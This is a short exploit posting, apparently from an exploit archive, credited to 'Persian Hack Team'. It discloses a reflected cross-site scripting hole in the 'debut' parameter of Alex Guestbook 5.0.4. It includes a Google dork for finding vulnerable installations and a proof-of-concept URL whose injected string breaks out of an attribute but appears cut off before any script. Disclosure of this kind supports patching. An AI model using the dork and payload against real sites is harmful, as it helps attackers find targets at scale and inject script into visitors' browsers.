# Exploit Title: Alex Guestbook Version 5.0.4 - Cross Site Scripting # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (Mojtaba Kazemi) # Vendor Home : http://www.alexguestbook.net/ # Home : http://persian-team.ir/ # Google Dork : inurl:alex_guestbook3 # Telegram Channel: @PersianHackTeam # Tested on: Linux # Date: 2017-05-23 # POC : # Cross Site Scripting : # debut Parameter Vulnerable To XSS http://www.server/alex_guestbook3/?debut=22237">&mots_search=&lang=&skin=&seeAdd=&seeNotes=&seeMess=&test= # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members # Iranian White Hat Hackers